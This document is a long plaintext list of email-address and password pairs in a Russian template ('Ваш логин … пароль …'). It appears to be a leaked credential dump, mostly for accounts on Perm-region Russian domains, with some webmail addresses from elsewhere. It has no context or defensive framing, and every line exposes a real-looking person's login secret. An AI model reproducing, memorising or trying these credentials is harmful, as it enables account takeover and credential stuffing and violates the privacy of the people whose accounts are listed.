Ваш логин - {fda77@usa.net} , пароль - raid
Ваш логин - {psvjaz@perm.raid.ru} , пароль - rryinqxq
Ваш логин - {vosia@perm.raid.ru} , пароль - grot
Ваш логин - {vosia@perm.raid.ru} , пароль - grot
Ваш логин - {dmitriy_public@usa.net} , пароль - kit
Ваш логин - {silv@permonline.ru} , пароль - kostik
Ваш логин - {combat@permonline.ru} , пароль - djdf
Ваш логин - {paul@perm.raid.ru} , пароль - osdvdkhe
Ваш логин - {azanov@perm.raid.ru} , пароль - rock
Ваш логин - {alex2@perm.raid.ru} , пароль - uxzbfniy
Ваш логин - {konkrit@pi.ccl.ru} , пароль - fish
Ваш логин - {AlexN@Raid.ru} , пароль - 230571
Ваш логин - {anised@permonline.ru} , пароль - disna
Ваш логин - {kobel@psu.ru} , пароль - cantaloop
Ваш логин - {argo@permonline.ru} , пароль - argo
Ваш логин - {sanf@mine.perm.su} , пароль - sanf
Ваш логин - {niko@permonline.ru} , пароль - xoce
Ваш логин - {kruglov@mail.raid.ru} , пароль - 14300sv
Ваш логин - {konst@ppk.perm.su} , пароль - kma
Ваш логин - {research@perm.raid.ru} , пароль - akgigrjm
Ваш логин - {blood@perm.raid.ru} , пароль - bjdiutzw
Ваш логин - {dennn@permonline.ru} , пароль - 123
Ваш логин - {kaa@perm.raid.ru} , пароль - ppgmldru
Ваш логин - {pspi@pstu.ac.ru} , пароль - xxxx
Ваш логин - {kitpage@perm.raid.ru} , пароль - uqekcbvu
Ваш логин - {stepan2@psu.ru} , пароль - im0647st
Ваш логин - {paul@maximum.perm.ru} , пароль - 328304
Ваш логин - {igor@permonline.ru} , пароль - AA
Ваш логин - {vorob1@psu.ru} , пароль - sa4770vo
Ваш логин - {michiv@permonline.ru} , пароль - magnum
Ваш логин - {lego@perm.raid.ru} , пароль - ordinateur
Ваш логин - {shilezzi@perm.raid.ru} , пароль - wuguhsrf
Ваш логин - {fizbin@perm.raid.ru} , пароль - fizbin
Ваш логин - {zuptus@pi.ccl.ru} , пароль - cjybr
Ваш логин - {livada@perm.raid.ru} , пароль - 15
Ваш логин - {vitbys@hotmail.com} , пароль - 211972
Ваш логин - {pakhan@perm.raid.ru} , пароль - qazxsw
Ваш логин - {major@perm.raid.ru} , пароль - auehopmd
Ваш логин - {mabroolo@permonline.ru} , пароль - dtnxbyf
Ваш логин - {stanki@pstu.ac.ru} , пароль - sweet
Ваш логин - {elena19@perm.raid.ru} , пароль - wewus
Ваш логин - {alex@ice.perm.ru} , пароль - goblin
Ваш логин - {topspice@permonline.ru} , пароль - andrew
Ваш логин - {olg@perm.raid.ru} , пароль - uyrpddpk
Ваш логин - {vic@perm.raid.ru} , пароль - 234623
Ваш логин - {demin@kkss.perm.ru} , пароль - 2528
Ваш логин - {conty@perm.raid.ru} , пароль - 30050
Ваш логин - {melloff@usa.net} , пароль - 18701
Ваш логин - {nagait@psu.ru} , пароль - thunder
Ваш логин - {al@raid.ru} , пароль - test
Ваш логин - {sorcerer@perm.raid.ru} , пароль - src
Ваш логин - {vera@perm.raid.ru} , пароль - vadim
Ваш логин - {coil@perm.raid.ru} , пароль - kkihidyw
Ваш логин - {exctel@perm.raid.ru} , пароль - dqomgaop
Ваш логин - {kirill_shark@geocities.com} , пароль - raidkir
Ваш логин - {koste@vtau-bsd.pstu.ac.ru} , пароль - evdkost
Ваш логин - {msv@gucb.perm.su} , пароль - sergey
Ваш логин - {aist@psu.ru} , пароль - ghjcnb1
Ваш логин - {sergcat@koi.halyava.ru} , пароль - 041918
Ваш логин - {agency@perm.raid.ru} , пароль - slweuybv
Ваш логин - {robb@perm.raid.ru} , пароль - robb
Ваш логин - {ugin@perm.raid.ru} , пароль - ciscswgg
Ваш логин - {ring@perm.raid.ru} , пароль - uvkepekk
Ваш логин - {ivonin@perm.raid.ru} , пароль - morgoth
Ваш логин - {sanya@perm.raid.ru} , пароль - bytqrvgm
Ваш логин - {sidcha@perm.raid.ru} , пароль - sidcha
Ваш логин - {ranger@perm.raid.ru} , пароль - jessi
Ваш логин - {megaval@perm.raid.ru} , пароль - enigma
Ваш логин - {stimul@perm.raid.ru} , пароль - 333997
Ваш логин - {denny@perm.raid.ru} , пароль - [hsx
Ваш логин - {ernst@perm.raid.ru} , пароль - pa-9-fmf1
Ваш логин - {sneg@perm.raid.ru} , пароль - ivmcvipc
Ваш логин - {ecs@perm.raid.ru} , пароль - avpzuocc
Ваш логин - {sly@perm.raid.ru} , пароль - kweeqfcu
Ваш логин - {master@perm.raid.ru} , пароль - sony
Ваш логин - {irinabas@perm.raid.ru} , пароль - gqnglwso
Ваш логин - kochvic@ , пароль - atibwdmp
Ваш логин - {squirrel@perm.raid.ru} , пароль - iuhcgbry
Ваш логин - {klimat@perm.raid.ru} , пароль - dwkgejxu
Ваш логин - {mereya@perm.raid.ru} , пароль - 6argcfqt
Ваш логин - {sokoloff@perm.raid.ru} , пароль - 459
Ваш логин - {radiy@perm.raid.ru} , пароль - aaquvldh
Ваш логин - {ros@perm.raid.ru} , пароль - ros
Ваш логин - {forbusy@hotmail.com} , пароль - kurilov
Ваш логин - {AStarodumov@svrw.ru} , пароль - x0hysqr0n
Ваш логин - {GorDen@perm.raid.ru} , пароль - reality
Ваш логин - {sher@raid.ru} , пароль - ИИИИИ
Ваш логин - {ace13m@hotmail.com} , пароль - asdfghjkl
Ваш логин - {tokamak@perm.raid.ru} , пароль - agrpcszs
Ваш логин - {tdd@perm.raid.ru} , пароль - mlfqnvzj
Ваш логин - {aztech@permonline.ru} , пароль - aztech
Ваш логин - {flag@pi.ccl.ru} , пароль - lexx
Ваш логин - {dmitryr@perm.raid.ru} , пароль - 140370
Ваш логин - {scool@raid.ru} , пароль - sergcool
Ваш логин - {kuznet4@psu.ru} , пароль - kb5424ku
Ваш логин - {cardio@pstu.ac.ru} , пароль - 123456
Ваш логин - {dmitrii.fount@usa.net} , пароль - 120875
Ваш логин - {avz@perm.raid.ru} , пароль - post
Ваш логин - {kac2@perm.raid.ru} , пароль - solaris
Ваш логин - {tka@cpl.pstu.ac.ru} , пароль - 653105
Ваш логин - {turin@ics.perm.su} , пароль - sharp
Ваш логин - {paa@perm.raid.ru} , пароль - bartok
Ваш логин - {avarkh@perm.raid.ru} , пароль - anutka
Ваш логин - {jura@raid.ru} , пароль - 23
Ваш логин - {audit@permonline.ru} , пароль - 1976
Ваш логин - {glavsnab@perm.raid.ru} , пароль - pruboqu
Ваш логин - {beast@ice.perm.ru} , пароль - config
Ваш логин - {kvin@perm.raid.ru} , пароль - f7s0412
Ваш логин - {mark@perm.raid.ru} , пароль - ====
Ваш логин - {yuris@raid.ru} , пароль - fuck
Ваш логин - {utrade@lysva.ru} , пароль - 654155
Ваш логин - {vladmari@net.spb.ru} , пароль - vLADKOV
Ваш логин - {ret@perm.raid.ru} , пароль - pnuvmkpv
Ваш логин - {su930@perm.raid.ru} , пароль - xkercjbd
Ваш логин - {sphera@perm.raid.ru} , пароль - kd5bjuuc
Ваш логин - {bushuev@permonline.ru} , пароль - 11111
Ваш логин - {bushueva@dzerbank.perm.ru} , пароль - 11111
Ваш логин - {turbo@perm.raid.ru} , пароль - avto
Ваш логин - {almaz@permonline.ru} , пароль - almaz
Ваш логин - {maxi_hooligans@hotmail.com} , пароль - sergeynolga
Ваш логин - {german@perm.raid.ru} , пароль - gera1213
Ваш логин - {red1201@perm.raid.ru} , пароль - 12011974
Ваш логин - {mazhugin@perm.raid.ru} , пароль - serjprem
Ваш логин - {vinodel@yahoo.com} , пароль - vinodel
Ваш логин - {kostit@psu.ru} , пароль - av8080ko
Ваш логин - {podsevalov@permonline.ru} , пароль - sos
Ваш логин - {VKorsakov@svrw.ru} , пароль - Vkorsakov
Ваш логин - {decabris@perm.raid.ru} , пароль - shc007
Ваш логин - {vasalexa@perm.raid.ru} , пароль - rxkhlmgq
Ваш логин - {swf@perm.raid.ru} , пароль - 1
Ваш логин - {crackman@perm.raid.ru} , пароль - cetusdyg
Ваш логин - {som@psu.ru} , пароль - pryroda
Ваш логин - {edik@npz.perm.lukoil.com} , пароль - cxzdsaewq
Ваш логин - {Lezhnev@perm.raid.ru} , пароль - 1981
Ваш логин - {sveta@raid.ru} , пароль - 123123
Ваш логин - {icbankdb@perm.raid.ru} , пароль - 1350bdb
Ваш логин - {orc@perm.raid.ru} , пароль - hfqzzhgd
Ваш логин - {shchep@psu.ru} , пароль - qwerty
Ваш логин - {smn@bc.permonline.ru} , пароль - utybq
Ваш логин - {aspid@tomcat.ru} , пароль - aspid
Ваш логин - {alecsandr@permonline.ru} , пароль - elena
Ваш логин - {raid_mail@svrw.ru} , пароль - 111
Ваш логин - {starik@psu.ru} , пароль - 987654321
Ваш логин - {ovda@perm.raid.ru} , пароль - pvvmrfam
Ваш логин - {vabank@perm.raid.ru} , пароль - utylxjtt
Ваш логин - {harm@perm.raid.ru} , пароль - west
Ваш логин - {smagin@perm.raid.ru} , пароль - dvsden
Ваш логин - {aliona@perm.raid.ru} , пароль - eietbirk
Ваш логин - {secretary@maximum.perm.ru} , пароль - boss
Ваш логин - {viking@dionis.mtts.perm.ru} , пароль - albert
Ваш логин - {s_gulin@yahoo.com} , пароль - 111
Ваш логин - {gulin2@psu.ru} , пароль - 111
Ваш логин - {dikwk@perm.raid.ru} , пароль - qaz
Ваш логин - {south@perm.raid.ru} , пароль - npcjnpjm
Ваш логин - {crackman@pi.ccl.ru} , пароль - 2DEAn8rP
Ваш логин - {dorstroy@perm.raid.ru} , пароль - djnfbwie
Ваш логин - {kudymkar@permonline.ru} , пароль - fuck
Ваш логин - {homov@perm.raid.ru} , пароль - kostik_74
Ваш логин - {alhar@perm.raid.ru} , пароль - hwb336bu
Ваш логин - {atinvest@perm.raid.ru} , пароль - izrp2exz
Ваш логин - {rolen@perm.raid.ru} , пароль - {rolentolik@psu.ru}
Ваш логин - {sbm@perm.raid.ru} , пароль - ruslan
Ваш логин - {g-terzo@pi.ccl.ru} , пароль - 892UpKxZ
Ваш логин - {kit@perm.raid.ru} , пароль - look
Ваш логин - {mlab3@pstu.ac.ru} , пароль - MLeon
Ваш логин - {jackvicktor@usa.net} , пароль - jackr
Ваш логин - {vkap@yahoo.com} , пароль - monitor
Ваш логин - {syozha@surf.pskb.creditfd.perm.su} , пароль - 12345678
Ваш логин - {adm@permts.ru} , пароль - 1234
Ваш логин - {kostja@ics.perm.su} , пароль - koks77
Ваш логин - {zdn@pi.ccl.ru} , пароль - kompros
Ваш логин - {prikamye@perm.raid.ru} , пароль - Oleg
Ваш логин - {tsi@permts.ru} , пароль - 1234
Ваш логин - {op@maximum.perm.ru} , пароль - music
Ваш логин - {au@pi.ccl.ru} , пароль - richard
Ваш логин - {Lord@perm.raid.ru} , пароль - 999
Ваш логин - {i.koryakov@idea.int} , пароль - boston
Ваш логин - {mag@icmm.ru} , пароль - rulez
Ваш логин - {dennis@perm.raid.ru} , пароль - anxperou
Ваш логин - {tet@perm.raid.ru} , пароль - rolengof
Ваш логин - {gilin@kkss.raid.ru} , пароль - iehbr
Ваш логин - {jony@perm.raid.ru} , пароль - jony
Ваш логин - {epmecon@psu.ru} , пароль - vbnmrf
Ваш логин - {mcc@permonline.ru} , пароль - 1154
Ваш логин - {pp@perm.raid.ru} , пароль - fish
Ваш логин - {maxxxand@hotmail.com} , пароль - ergostar
Ваш логин - {anatol@permonline.ru} , пароль - drowssap
Ваш логин - {ira@perm.raid.ru} , пароль - bihtyzd5
Ваш логин - {smacker@perm.raid.ru} , пароль - yaa6205se
Ваш логин - {markin1@inter.net.il} , пароль - grisha
Ваш логин - {olga@asu.pstu.ac/ru} , пароль - vilatova
Ваш логин - {rvs@perm.raid.ru} , пароль - rvsh
Ваш логин - {sergo@pi.ccl.ru} , пароль - 25
Ваш логин - {pcsm@perm.raid.ru} , пароль - fog+2
Ваш логин - {bbl@perm.raid.ru} , пароль - veohvefs
Ваш логин - {novikov@perm.raid.ru} , пароль - open36
Ваш логин - {krugreal@perm.raid.ru} , пароль - 673
Ваш логин - {mscomp@mail.psu.ru} , пароль - integer
Ваш логин - {tolik@psu.ru} , пароль - stolik
Ваш логин - {kazakov@pspu.ac.ru} , пароль - kazakov
Ваш логин - {mai@ics.perm.su} , пароль - bmw850
Ваш логин - {svs@permonline.ru} , пароль - 141072
Ваш логин - {badin@vtau-bsd.pstu.ac.ru} , пароль - gold4
Ваш логин - {romam@raid.ru} , пароль - pol
Ваш логин - {misha@ics.perm.su} , пароль - 643370
Ваш логин - {ochern@atlab.pstu.ac.ru} , пароль - scyvr
Ваш логин - {prosh@psu.ru} , пароль - poiuyt
Ваш логин - {mna55@perm.raid.ru} , пароль - ppsdj1rb
Ваш логин - {str@pi.ccl.ru} , пароль - hello
Ваш логин - {bigserg@perm.raid.ru} , пароль - fatman
Ваш логин - {polebear@bigfoot.com} , пароль - polebear
Ваш логин - {AndreyU@raid.ru} , пароль - aszx
Ваш логин - {meloch@perm.raid.ru} , пароль - akndhtdd
Ваш логин - {srg@perm.raid.ru} , пароль - ageqbdme
Ваш логин - {vict013@perm.raid.ru} , пароль - nawajyqq
Ваш логин - {serg@bc.permonline.ru} , пароль - ats24
Ваш логин - {kolesov@perm.raid.ru} , пароль - rrjfhtuf
Ваш логин - {bokovsv@perm.raid.ru} , пароль - uwiyqw0r
Ваш логин - {merlin@lysva.ru} , пароль - ctktrn
Ваш логин - {gallurgy@perm.raid.ru} , пароль - mk
Ваш логин - {vsuslov@hotmail.com} , пароль - ghjcnj
Ваш логин - {daryaz@perm.raid.ru} , пароль - knld-6
Ваш логин - {al@ics.perm.su} , пароль - balnik
Ваш логин - {mbb@perm.raid.ru} , пароль - aeeljsfo
Ваш логин - {piv@perm.raid.ru} , пароль - japxduiq
Ваш логин - {demin@kkss.raid.ru} , пароль - 131078
Ваш логин - {1@1.1} , пароль - 1
Ваш логин - {vladstah@perm.raid.ru} , пароль - b541395
Ваш логин - {mr_dupel@windoms.sitek.net} , пароль - c9k0mz
Ваш логин - {savchenko@kkss.raid.ru} , пароль - 742812
Ваш логин - {svetav@raid.ru} , пароль - svetav
Ваш логин - {john@permonline.ru} , пароль - andrey
Ваш логин - {anog@usi.perm.ru} , пароль - sandworm
Ваш логин - {mag@perm.raid.ru} , пароль - fwdmkaad
Ваш логин - {winner@perm.raid.ru} , пароль - mutycd62
Ваш логин - {Onegov@perm.raid.ru} , пароль - e995wrc4
Ваш логин - {iax@permonline.ru} , пароль - lucas
Ваш логин - {vd@perm.raid.ru} , пароль - 9vj124ah
Ваш логин - {gubanov@perm.raid.ru} , пароль - 123
Ваш логин - {ra9foc@perm.raid.ru} , пароль - 4823
Ваш логин - {gluck@sbs.perm.ru} , пароль - gjhyj
Ваш логин - {rai@perm.raid.ru} , пароль - jllotxwk
Ваш логин - {madmax@psu.ru} , пароль - qqq
Ваш логин - {kunguroil@pi.ccl.ru} , пароль - 123
Ваш логин - {muhin@permonline.ru} , пароль - muhin
Ваш логин - {fe0200k1@fe.nettuno.it} , пароль - anat
Ваш логин - {guseln@psu.ru} , пароль - am8362gu
Ваш логин - {vitus@perm.raid.ru} , пароль - 492060
Ваш логин - {nickola@perm.raid.ru} , пароль - n67cacze
Ваш логин - {maw@cs.perm.ru} , пароль - j262
Ваш логин - {ocenka@sar.udm.net} , пароль - Lizard
Ваш логин - {igor@perm.raid.ru} , пароль - fbofszii
Ваш логин - {jindos@yahoo.com} , пароль - 614007
Ваш логин - {andrey97@perm.raid.ru} , пароль - asd
Ваш логин - {vostokv@perm.raid.ru}. , пароль - qwe
Ваш логин - {gmd@perm.raid.ru} , пароль - sbyszfyi
Ваш логин - {ler8@perm.raid.ru} , пароль - hlbisqhl
Ваш логин - {iulia@perm.raid.ru} , пароль - s1w8i6re
Ваш логин - {raven@perm.raid.ru} , пароль - westural
Ваш логин - {pvl@asu.pstu.ac.ru} , пароль - Godwithus
Ваш логин - {yatsaer@macs.biu.ac.il} , пароль - Fig32Vam
Ваш логин - {nhm@permonline.ru} , пароль - nhm
Ваш логин - {tss@pi.ccl.ru} , пароль - tss
Ваш логин - {paclan@perm.raid.ru} , пароль - 033045
Ваш логин - {alex@perm.raid.ru} , пароль - linux
Ваш логин - {toobusy@chat.ru} , пароль - kurilov
Ваш логин - {unitskiy@perm.raid.ru} , пароль - umg
Ваш логин - {ee@raid.ru} , пароль - 12346
Ваш логин - {buckfast@mail.ru} , пароль - 280586
Ваш логин - {psaa1@pstu.ac.ru} , пароль - asd
Ваш логин - {domostil@perm.raid.ru} , пароль - 1wew0qtc
Ваш логин - {OSB1795@NARZAN.COM} , пароль - MASTER
Ваш логин - {batuev@pspu.ac.ru} , пароль - 26183297
Ваш логин - {maxx@tavria.comint.net} , пароль - mashine
Ваш логин - {shalexey@chat.ru} , пароль - pospposp
Ваш логин - {ab@pstu.ac.ru} , пароль - keen
Ваш логин - {pt@perm.raid.ru} , пароль - tb477cqb
Ваш логин - {Kolobov@permonline.ru} , пароль - Xbrfuj
Ваш логин - {kerov@perm.raid.ru} , пароль - dbvdcbre
Ваш логин - {xwalkman@perm.raid.ru} , пароль - puppy
Ваш логин - {sultan@perm.raid.ru} , пароль - rz2e4x7k
Ваш логин - {razum@permonline.ru} , пароль - durak
Ваш логин - {spam@prognoz.ru} , пароль - connect
Ваш логин - {greyspid@chat.ru} , пароль - spider
Ваш логин - {krenzler@ics.perm.su} , пароль - aklm
Ваш логин - {sus@pi.ccl.ru} , пароль - pdheqrvs
Ваш логин - {newtestm@perm.raid.ru} , пароль - asd
Ваш логин - {alekto@perm.raid.ru} , пароль - 6nc0ejn7
Ваш логин - {maxim@rmcpk.pstu.ac.ru} , пароль - werth
Ваш логин - {t7inform@tvt7.perm.su} , пароль - КЮИЙЮ
Ваш логин - {narrusfn@chat.ru} , пароль - woolly
Ваш логин - {maiya@perm.raid.ru} , пароль - jpwb2g7w
Ваш логин - {cservis@perm.raid.ru} , пароль - aiolozik
Ваш логин - {mig@perm.raid.ru} , пароль - terminator
Ваш логин - {kuznet6@psu.ru} , пароль - 456668
Ваш логин - {ksa@uralexpress.ru} , пароль - cthutq
Ваш логин - {sergik@degacom.ru} , пароль - 1
Ваш логин - {az@microsoft.com} , пароль - geroy
Ваш логин - {Gus@perm.raid.ru} , пароль - isdvhyqk
Ваш логин - {kocher@psu.ru} , пароль - elephant
Ваш логин - {depsal@star.pbc.ru} , пароль - vjyjkbn
Ваш логин - {terc@perm.raid.ru} , пароль - terc
Ваш логин - {kps@perm.raid.ru} , пароль - azsxd
Ваш логин - {volkov@mail.perm.ru} , пароль - papa
Ваш логин - {oliv@perm.raid.ru} , пароль - 1968
Ваш логин - {tei18@perm.raid.ru} , пароль - rdr5awp2
Ваш логин - {infra-2@adm.perm.ru} , пароль - 666
Ваш логин - {olga@mts5.mmtel.ru} , пароль - cleo
Ваш логин - {popov7@psu.ru} , пароль - 12547
Ваш логин - {mms@mail.pfpg.ru} , пароль - 1978
Ваш логин - {manel@perm.raid.ru} , пароль - fed7rk47
Ваш логин - {nira@perm.raid.ru} , пароль - aetruhah
Ваш логин - {holm@perm.raid.ru} , пароль - fsutktw5
Ваш логин - {mityag@psu.ru} , пароль - al6663mi
Ваш логин - {alextr@mail.ru} , пароль - sense
Ваш логин - {lsa@permonline.ru} , пароль - 839
Ваш логин - {vinzavod@permonline.ru} , пароль - pvz98
Ваш логин - {kladov@psu.ru} , пароль - kl5472ut
Ваш логин - {kosta@kitgroup.ru} , пароль - kosta
Ваш логин - {mirr@raid.ru} , пароль - mikl
Ваш логин - {hardwman@chat.ru} , пароль - hardwman
Ваш логин - {ramses@mail.usa.com} , пароль - serge
Ваш логин - {elkhart@perm.raid.ru} , пароль - elkhart
Ваш логин - {luba@omi.irk.ru} , пароль - 3333333333
Ваш логин - {as@permonline.ru} , пароль - 123
Ваш логин - {teterev@permonline.ru} , пароль - Fnkfc
Ваш логин - {lepichin@perm.raid.ru} , пароль - yhylqtvk
Ваш логин - {pbmail@perm.raid.ru} , пароль - jenner
Ваш логин - {wg03sto@bc.permonline.ru} , пароль - sto120ip
Ваш логин - {mv@pi.ccl.ru} , пароль - 1799
Ваш логин - {alexeyv@perm.raid.ru} , пароль - alexeyv
Ваш логин - {cyclone@perm.raid.ru} , пароль - 1121
Ваш логин - {tnt@imc.perm.ru} , пароль - metallica
Ваш логин - {ykut@perm.raid.ru} , пароль - xfv1bb3y
Ваш логин - {cyborg@perm.raid.ru} , пароль - 1964
Ваш логин - {vladm@perm.raid.ru} , пароль - 330320
Ваш логин - {andrey94@chat.ru} , пароль - 8ka14
Ваш логин - {big@dzerbank.perm.ru} , пароль - 12
Ваш логин - {boris@perm.raid.ru} , пароль - htgjvsdq
Ваш логин - {yuriy@perm.raid.ru} , пароль - goga
Ваш логин - {pavlov@perm.raid.ru} , пароль - huxwnvim
Ваш логин - {shtop@perm.raid.ru} , пароль - fshdqsgp
Ваш логин - {gorden@perm.raid.ru} , пароль - reality
Ваш логин - {biko@perm.raid.ru} , пароль - yrrdz6nq
Ваш логин - {mgw@perm.raid.ru} , пароль - mgw150
Ваш логин - {dj@maximum.perm.ru} , пароль - max
Ваш логин - {simeon@perm.raid.ru} , пароль - kmydxgma
Ваш логин - 2 , пароль - 5030/243.20@fidonet
Ваш логин - {dimd@lysva.ru} , пароль - ljkub[
Ваш логин - {upng@pi.ccl.ru} , пароль - {upng@pi.ccl.ru}
Ваш логин - {kost@mail.ru} , пароль - lena
Ваш логин - {info@maximum.perm.ru} , пароль - maximum
Ваш логин - {golikov@perm.raid.ru} , пароль - 123321
Ваш логин - {tcmk@perm.raid.ru} , пароль - gis
Ваш логин - {samusenko@permonline.ru} , пароль - auto
Ваш логин - {school28@perm.raid.ru} , пароль - podpis
Ваш логин - {solom1@psu.ru} , пароль - hhrsrjdv
Ваш логин - {big@null.ru} , пароль - verybig
Ваш логин - {mf@mail.raid.ru} , пароль - yigi
Ваш логин - {kataev@perm.raid.ru} , пароль - 647938
Ваш логин - {luchnikov@kkss.raid.ru} , пароль - 721291
Ваш логин - {romkin@hotmail.com} , пароль - romkin
Ваш логин - {pglevin@tnk.ru} , пароль - condom
Ваш логин - {valgor_63@yahoo.com} , пароль - roglav
Ваш логин - {gupm@pmce.ru} , пароль - cgfhnfr
Ваш логин - {gump@ipmce.ru} , пароль - cgfhnfr
Ваш логин - {mishaha@mail.reltec.ru} , пароль - machine
Ваш логин - {ole_andr@hotmail.com} , пароль - game
Ваш логин - {kataev@raid.ru} , пароль - 647938
Ваш логин - {kataev@kkss.raid.ru} , пароль - 647938
Ваш логин - {alur@perm.raid.ru} , пароль - fgipfuwk
Ваш логин - {vfnbrg@orc.ru} , пароль - 572689
Ваш логин - {mmb_spb@mail.ru} , пароль - mmb_spb
Ваш логин - {shavliuk@mtu-net.ru} , пароль - 7535268
Ваш логин - {shif@spb.ru} , пароль - alex
Ваш логин - {vince@sitcom.co.il} , пароль - malysh
Ваш логин - {sweetbox@chat.ru} , пароль - explorer
Ваш логин - {agent_al@bigfoot.com} , пароль - radeos
Ваш логин - {gek63@chat.ru} , пароль - kyv1
Ваш логин - {stauf@moldnet.md} , пароль - k0g0nad0
Ваш логин - {sanja_s@hotmail.com} , пароль - 111
Ваш логин - {SkvoPhilipp@USA.net} , пароль - 100387
Ваш логин - {mikel@perm.raid.ru} , пароль - t1404
Ваш логин - {mstuiu7@dialup.ptt.ru} , пароль - zorro100
Ваш логин - {kolomba@chat.ru} , пароль - umka
Ваш логин - {yumalnev@deol.ru} , пароль - aafbrpgs
Ваш логин - {kolya3@hotmail.com} , пароль - mitino
Ваш логин - {artur@liburna.ryazan.ru} , пароль - art
Ваш логин - {ppshalfo@cityline.ru} , пароль - ghkuj
Ваш логин - {semencov%gw.mogilev.energo.net@ns1.energo.net.by} , пароль -
1972
Ваш логин - {NLitzinger@svrw.ru} , пароль - rjkzy
Ваш логин - {eai_@hotmail.com} , пароль - qwerty
Ваш логин - {abond@mail.ru} , пароль - papasasa
Ваш логин - {skull@ars.dorms.spbu.ru} , пароль - skull
Ваш логин - {cidima98@cityline.ru} , пароль - 770225
Ваш логин - {vladp@perm.raid.ru} , пароль - vladp41
Ваш логин - {inferno@inferno.zssm.zp.ua} , пароль - synthesizerist
Ваш логин - {andy@ufps.perm.su} , пароль - lazzy
Ваш логин - {nessi@public.usa.com} , пароль - serg
Ваш логин - {cergn@permonline.ru} , пароль - 001013
Ваш логин - {interfac@perm.raid.ru} , пароль - igwgekkk
Ваш логин - {spac_s@mail.ru} , пароль - spac
Ваш логин - {magsmz@permonline.ru} , пароль - wertikal
Ваш логин - {lpa89@hotmail.com} , пароль - hjccbz
Ваш логин - {bitteknika@permonline.ru} , пароль - 555
Ваш логин - {qwerty@perm.raid.ru} , пароль - aspid
Ваш логин - {ali_kama@chat.ru} , пароль - salivon
Ваш логин - {ali_kama@mail.ru} , пароль - salivon
Ваш логин - {ch3oh@bigfoot.com} , пароль - ch3oh
Ваш логин - {Igor.Altyncev@p12.f9.n5054.z2.fidonet.org} , пароль - yjxm
Ваш логин - {Igor.Altyncev@p1.f53.n5054.z2.fidonet.org} , пароль - yjxm
Ваш логин - {sergekot@mail.ru} , пароль - rjntyjr
Ваш логин - {avigaz@perm.raid.ru} , пароль - wmj1r7h7
Ваш логин - {Nboulaev@npo.perm.lukoil.com} , пароль - 12 90
Ваш логин - {BORIS@PERM.RAID.RU} , пароль - HTGJVSDQ
Ваш логин - {rla@chat.ru} , пароль - rolan
Ваш логин - {costa@perm.raid.ru} , пароль - vaz21083v881vt
Ваш логин - {prnu_evg@chat.ru} , пароль - jalas
Ваш логин - {tolcin@mail.ru} , пароль - 7N1975
Ваш логин - {uzalex@mail.ru} , пароль - 123rty
Ваш логин - {ant_sh@bigfoot.com} , пароль - revolver
Ваш логин - {ok@perm.raid.ru} , пароль - ewxnhbfv
Ваш логин - {oleg@stlink.perm.ru} , пароль - 227
Ваш логин - {damir@perm.raid.ru} , пароль - spard
Ваш логин - {admin@permill.ru} , пароль - verfrf
Ваш логин - {alex@prmene.perm.su} , пароль - ghj,f
Ваш логин - {ann@skamsk.ru} , пароль - ann&net
Ваш логин - {rim@raid.ru} , пароль - airwolf
Ваш логин - {lionherz@chat.ru} , пароль - 240277
Ваш логин - {toka@mtts.perm.ru} , пароль - funai
Ваш логин - {olegp@hnet.energo.ru} , пароль - rjhvxbq
Ваш логин - {wictorsinguhr@usa.net} , пароль - w
Ваш логин - {mihaylov@hnet.energo.ru} , пароль - 'yutkmcf63
Ваш логин - {bazis@bigfoot.com} , пароль - fhybrf
Ваш логин - {platptf@perm.raid.ru} , пароль - p1nr0w07
Ваш логин - {mspb.stock@comset.net} , пароль - russia
Ваш логин - {lang@perm.raid.ru} , пароль - 3xbvhi4e
Ваш логин - {hip@ban.gus.elcom.ru} , пароль - 680149
Ваш логин - {koff@mol.ru} , пароль - 2178280
Ваш логин - {acidmail@mtu-net.ru} , пароль - 1537290
Ваш логин - {ppj@mail.ru} , пароль - 123098
Ваш логин - {kundor@mail.ru} , пароль - doomer
Ваш логин - {losev@jeo.ru} , пароль - silverroof
Ваш логин - {zenifyad@perm.raid.ru} , пароль - 4iwsek9
Ваш логин - {rogalev@chat.ru} , пароль - xmasquadra
Ваш логин - {padre@redhill.istra.ru} , пароль - padre666
Ваш логин - {alex@volkov.ru} , пароль - {alex@volkov.ru}
Ваш логин - {starwalker@cyberdude.com} , пароль - metald
Ваш логин - {n33@chat.ru} , пароль - 150064
Ваш логин - {npois@chat.ru} , пароль - kim
Ваш логин - {nightman@mail.ru} , пароль - 11211981
Ваш логин - {proper@public.asdc.kz} , пароль - al
Ваш логин - {teddybear@soi3.mmtel.ru} , пароль - ghjnbdjufp
Ваш логин - {dielove@mail.ru} , пароль - ilovevica
Ваш логин - {dimkin__@hotmail.com} , пароль - 1234
Ваш логин - {aiu@global.kz} , пароль - coco
Ваш логин - {fil@utb.ru} , пароль - descent
Ваш логин - {valerkin@hotmail.com} , пароль - iagle
Ваш логин - {lenok-dvm@mtu-net.ru} , пароль - pol
Ваш логин - {repro@mcpp.co.ru} , пароль - 1701
Ваш логин - {petrov@genebee.msu.su} , пароль - Gtnhjd
Ваш логин - {pguskov@mail.ru} , пароль - polmig
Ваш логин - {f_arik@hotmail.com} , пароль - 5199119
Ваш логин - {borisk@tomcat.ru} , пароль - gfhjkm
Ваш логин - {slav_@chat.ru} , пароль - dsv96
Ваш логин - {interservice@tuapse.ru} , пароль - pupseak
Ваш логин - {iprdn@cea.ru} , пароль - kennel
Ваш логин - {igor.p@eudoramail.com} , пароль - anna1999
Ваш логин - {garaz@mail.cnt.ru} , пароль - sas
Ваш логин - {helimski@isdn.net.il} , пароль - 11
Ваш логин - {zeus@perm.raid.ru} , пароль - zeus99
Ваш логин - {pavel@termeh.tu-chel.ac.ru} , пароль - rumata
Ваш логин - {Pahhaner@nettaxi.com} , пароль - 198369
Ваш логин - {eastlion@chat.ru} , пароль - sherhanzade
Ваш логин - {fcb@perm.raid.ru} , пароль - ffdkgoes
Ваш логин - {brule@mail.ru} , пароль - prost
Ваш логин - {ray13579@mail.ru} , пароль - 13579
Ваш логин - {Stocker@mail.ru} , пароль - 415stin
Ваш логин - {alexei@perm.raid.ru} , пароль - 123
Ваш логин - {baranmmm@mail.ru} , пароль - baraneiro
Ваш логин - {fomine@perm.raid.ru} , пароль - hrdolmro
Ваш логин - {umka3d@jeo.ru} , пароль - 0424
Ваш логин - {ipxenia@usa.net} , пароль - rrc1976
Ваш логин - {pb8542@belsonet.net} , пароль - 14O373O4
Ваш логин - {kwota@perm.raid.ru} , пароль - w5gc1cnf
Ваш логин - {asbis@perm.raid.ru} , пароль - 8k50cz0t
Ваш логин - {bob@psu.ru} , пароль - sbob
